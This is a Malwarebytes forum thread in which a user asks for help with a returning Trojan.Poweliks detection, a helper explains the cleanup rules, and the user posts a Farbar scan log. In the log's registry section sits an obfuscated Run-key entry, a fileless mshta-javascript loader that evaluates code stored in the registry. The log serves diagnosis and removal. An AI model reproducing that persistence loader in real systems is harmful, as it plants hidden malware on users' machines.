Jump to content

Trojan.Powelike!bat


Recommended Posts

I'm getting more afraid by the second.

McAfee warns me that this file is quarantined every time I start my laptop. I look into the file directory, and every time I delete it, the batch file returns and McAfee warning pops up again saying the file is quarantined. I did a quick search saying that the trojan will "gain remote access, steal personal info, etc." but I don't know if this specific trojan actually does this. I ran ESET Poweliks already and it said no infection was found. I did a scan on Malwarebytes and the file was deleted aswell, but returned. Same with McAfee.

Can someone give me an explanation on why this is happening?

1.JPG

2.JPG

Link to post
Share on other sites

Hi NighthawkAviation :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.

  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on Malwarebytes Forums, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against Malwarebytes Forums's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread;


This being said, it's time to clean-up some malware, so let's get started, shall we? :)

I'll need you to provide me a set of FRST logs to begin my analysis. Follow the instructions in the thread below, and copy/paste the content of both FRST.txt and Addition.txt in your next reply(ies).

https://forums.malwarebytes.org/topic/189551-trojanpowelikebat/

 

Link to post
Share on other sites

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-10-2016
Ran by Kyle Aniel (ATTENTION: The user is not administrator) on KYLE-PC (19-10-2016 14:47:59)
Running from C:\Users\Kyle Aniel\Downloads
Loaded Profiles: Kyle Aniel (Available Profiles: Kyle Aniel & Izach Aniel & banie_000 & Guest)
Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

Failed to access process -> smss.exe
Failed to access process -> csrss.exe
Failed to access process -> wininit.exe
Failed to access process -> csrss.exe
Failed to access process -> winlogon.exe
Failed to access process -> services.exe
Failed to access process -> lsass.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> dwm.exe
Failed to access process -> WUDFHost.exe
Failed to access process -> svchost.exe
Failed to access process -> OmniServ.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> igfxCUIService.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> hpservice.exe
Failed to access process -> RtkAudioService64.exe
Failed to access process -> RAVBg64.exe
Failed to access process -> RAVBg64.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> spoolsv.exe
Failed to access process -> svchost.exe
Failed to access process -> AdAppMgrSvc.exe
Failed to access process -> mDNSResponder.exe
Failed to access process -> AppleMobileDeviceService.exe
Failed to access process -> OfficeClickToRun.exe
Failed to access process -> armsvc.exe
Failed to access process -> remoting_host.exe
Failed to access process -> HD-LogRotatorService.exe
Failed to access process -> HPWMISVC.exe
Failed to access process -> svchost.exe
Failed to access process -> Verizon_IHAMessageCenter.exe
Failed to access process -> ibtsiva.exe
Failed to access process -> gramblr.exe
Failed to access process -> HeciServer.exe
Failed to access process -> mbamscheduler.exe
Failed to access process -> mbamservice.exe
Failed to access process -> mcsacore.exe
Failed to access process -> mfevtps.exe
Failed to access process -> UpdateService.exe
Failed to access process -> mfemms.exe
Failed to access process -> SRService.exe
Failed to access process -> PEFService.exe
Failed to access process -> SSUService.exe
Failed to access process -> svchost.exe
Failed to access process -> PMBDeviceInfoProvider.exe
Failed to access process -> SynTPEnhService.exe
Failed to access process -> svchost.exe
Failed to access process -> dasHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe
Failed to access process -> SRManager.exe
Failed to access process -> mfevtps.exe
Failed to access process -> WmiPrvSE.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
Failed to access process -> mfefire.exe
Failed to access process -> mfefire.exe
Failed to access process -> McAPExe.exe
Failed to access process -> McSvHost.exe
Failed to access process -> svchost.exe
Failed to access process -> PresentationFontCache.exe
Failed to access process -> SRFeature.exe
Failed to access process -> SRServer.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
Failed to access process -> GoogleCrashHandler.exe
Failed to access process -> GoogleCrashHandler64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
Failed to access process -> opvapp.exe
(McAfee, Inc.) C:\Program Files (x86)\Internet Content Filter\mfp.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe
Failed to access process -> hpqwmiex.exe
Failed to access process -> SearchIndexer.exe
Failed to access process -> WmiPrvSE.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP ENVY 7640 series\Bin\HPNetworkCommunicatorCom.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe
(Spotify Ltd) C:\Users\Kyle Aniel\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Flux Software LLC) C:\Users\Kyle Aniel\AppData\Local\FluxSoftware\Flux\flux.exe
Failed to access process -> McCSPServiceHost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hp\HP System Event\HPMSGSVC.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
Failed to access process -> HPSA_Service.exe
Failed to access process -> HPSupportSolutionsFrameworkService.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
Failed to access process -> IAStorDataMgrSvc.exe
Failed to access process -> IntelMeFWService.exe
Failed to access process -> jhi_service.exe
Failed to access process -> LMS.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ActionUriServer.exe
Failed to access process -> ModuleCoreService.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\McChHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Failed to access process -> rundll32.exe
(Node.js) C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\Resources\bin\node.exe
Failed to access process -> svchost.exe
Failed to access process -> McClientAnalytics.exe
Failed to access process -> wermgr.exe
Failed to access process -> SearchProtocolHost.exe
(FXHOME) C:\Program Files\FXHOME\HitFilm 4 Express\HitFilmExpress.exe
() C:\Program Files\FXHOME\HitFilm 4 Express\Skyway_Guard.exe
(Node.js) C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\Resources\bin\node.exe
Failed to access process -> mfeicfcore.exe
Failed to access process -> WerFault.exe
(The NWJS Community) C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\hitfilm-4-express.exe
(The NWJS Community) C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\hitfilm-4-express.exe
Failed to access process -> fontdrvhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Failed to access process -> VzDetectAgent.exe
Failed to access process -> conhost.exe
(The NWJS Community) C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\hitfilm-4-express.exe
(The NWJS Community) C:\Program Files\FXHOME\HitFilm 4 Express\ActivationApp\hitfilm-4-express.exe
Failed to access process -> SearchFilterHost.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8505088 2015-07-03] (Realtek Semiconductor)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech, Inc.)
HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-03-19] (Apple Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [500936 2015-04-28] (Adobe Systems Incorporated)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954296 2015-12-11] (Synaptics Incorporated)
HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [126240 2014-04-01] (Hewlett-Packard Company)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [ADSK DLMSession] => C:\Program Files (x86)\Common Files\Autodesk Shared\Autodesk Download Manager\DLMSession.exe [1627032 2014-02-05] (Autodesk, Inc.)
HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [493960 2014-12-04] (Autodesk Inc.)
HKLM-x32\...\Run: [ICF] => C:\Program Files (x86)\Internet Content Filter\mfp.exe [3331408 2013-08-19] (McAfee, Inc.)
HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2000896 2014-04-04] (iSkySoft)
HKLM-x32\...\Run: [PMBVolumeWatcher] => C:\Program Files (x86)\Sony\PlayMemories Home\PMBVolumeWatcher.exe [2669568 2015-04-17] (Sony Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597552 2015-08-04] (Oracle Corporation)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\HP\HP System Event\HPMSGSVC.exe [653576 2015-06-29] (Hewlett-Packard Development Company, L.P.)
HKLM\...\RunOnce: [SRS_APO_Install] => C:\WINDOWS\system32\SRSLabs\{176F4E15-8F7C-4833-ADED-81FAE8CCD186}\slInit64.dll [214776 2015-07-03] (SRS Labs, Inc.)
HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [55264 2016-03-10] (Malwarebytes)
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Power2GoExpress8] => 0
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Google Update] => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe [107848 2015-04-30] (Google Inc.)
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [HP ENVY 7640 series (NET)] => C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe [3483656 2014-08-22] (Hewlett-Packard Development Company, LP)
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8591272 2015-11-16] (Piriform Ltd)
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [iFunBox] => C:\Program Files (x86)\i-Funbox DevTeam\iFunBox_x64.exe [2783232 2015-07-27] (i-Funbox.com)
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [MurGee.com Auto Clicker] => C:\Users\Kyle Aniel\AppData\Roaming\Auto Clicker\AutoClicker.exe [124072 2016-04-20] (MurGee.com)
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Spotify Web Helper] => C:\Users\Kyle Aniel\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1555056 2016-08-13] (Spotify Ltd)
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Spotify] => C:\Users\Kyle Aniel\AppData\Roaming\Spotify\Spotify.exe [6937200 2016-08-13] (Spotify Ltd)
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Air Mouse Server] => C:\Users\Kyle Aniel\Downloads\AirMouse.exe [202240 2016-10-01] ()
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [f.lux] => C:\Users\Kyle Aniel\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-23] (Flux Software LLC)
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [**bquflhx<*>] => "C:\WINDOWS\system32\mshta.exe" javascript:RHY2M="cnlfCDX";P1x=new%20ActiveXObject("WScript.Shell");Bvpcj7n4V="bzjV";mzF9K7=P1x.RegRead("HKCU\\software\\dcyozhn\\eyzxwqjdey");N1QuJVU="T";eval(mzF9K7); (the data entry has 17 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [**xwhehhqlxw<*>] => "C:\Users\Kyle Aniel\AppData\Local\f70e5\db038.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\RunOnce: [Uninstall C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\amd64"
Startup: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3509d.lnk [2016-10-19]
Startup: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2015-11-13]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation)
GroupPolicyUsers\S-1-5-21-23814709-2432651133-2868963390-1001\User: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{849d57b1-e8c7-4cf9-a689-c5cbbe5b3d71}: [DhcpNameServer] 192.168.48.1
Tcpip\..\Interfaces\{caebb8ce-2c7b-43c1-bdca-7787c2b0f2a1}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,First Home Page = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
SearchScopes: HKLM -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL =
SearchScopes: HKLM-x32 -> {7A114980-B164-4074-B049-DAB2741B7BD5} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL =
SearchScopes: HKU\.DEFAULT -> DefaultScope {D53E7C40-DA4D-443C-8C6F-A7B1F8CB1299} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=B011US756D20141101&p={SearchTerms}
SearchScopes: HKU\.DEFAULT -> {D53E7C40-DA4D-443C-8C6F-A7B1F8CB1299} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=B011US756D20141101&p={SearchTerms}
SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1001 -> DefaultScope {94A123C6-6854-4664-8E3F-C438B740C9CC} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=C015US756D20151120&p={searchTerms}
SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1001 -> {7A114980-B164-4074-B049-DAB2741B7BD5} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1001 -> {94A123C6-6854-4664-8E3F-C438B740C9CC} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=C015US756D20151120&p={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-10-08] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-10-08] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll [2015-10-16] (Oracle Corporation)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-04-04] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll [2015-10-16] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-10-03] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-10-03] (McAfee, Inc.)
Handler-x32: http - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)
Handler-x32: http - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)
Handler-x32: https - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)
Handler-x32: https - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)
Handler-x32: ipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)
Handler-x32: msdaipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)
Handler-x32: msdaipp - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-10-03] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-10-03] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2016-07-07] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2016-07-07] (McAfee, Inc.)

FireFox:
========
FF ProfilePath: C:\Users\Kyle Aniel\AppData\Roaming\Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853 [2016-10-19]
FF NewTab: Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853 -> about:newtab
FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853 -> Secure Search
FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853 -> Secure Search
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853 -> Secure Search
FF Homepage: Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853 -> about:home
FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2016-10-13]
FF SearchPlugin: C:\Users\Kyle Aniel\AppData\Roaming\Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853\searchplugins\McSiteAdvisor.xml [2016-10-02]
FF ProfilePath: C:\Users\Kyle Aniel\AppData\Roaming\AIR\SBACSecureBrowser8.1\Profiles\xt3vvi0n.default [2016-03-14]
FF ProfilePath: C:\Users\Kyle Aniel\AppData\Roaming\AIR\CASecureBrowser8.0\Profiles\4pz09am7.default [2015-11-24]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2016-08-12] [not signed]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-07-11]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_185.dll [2016-10-11] ()
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-07-07] ()
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2015-03-09] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_185.dll [2016-10-11] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1218158.dll [2015-04-27] (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2016-03-08] ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2016-08-25] (Google)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll [2015-10-16] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll [2015-10-16] (Oracle Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-07-07] ()
FF Plugin-x32: @mcafee.com/MVT -> C:\Program Files (x86)\McAfee\Supportability\MVT\NPMVTPlugin.dll [2014-12-08] (McAfee, Inc.)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-10-07] (Microsoft Corporation)
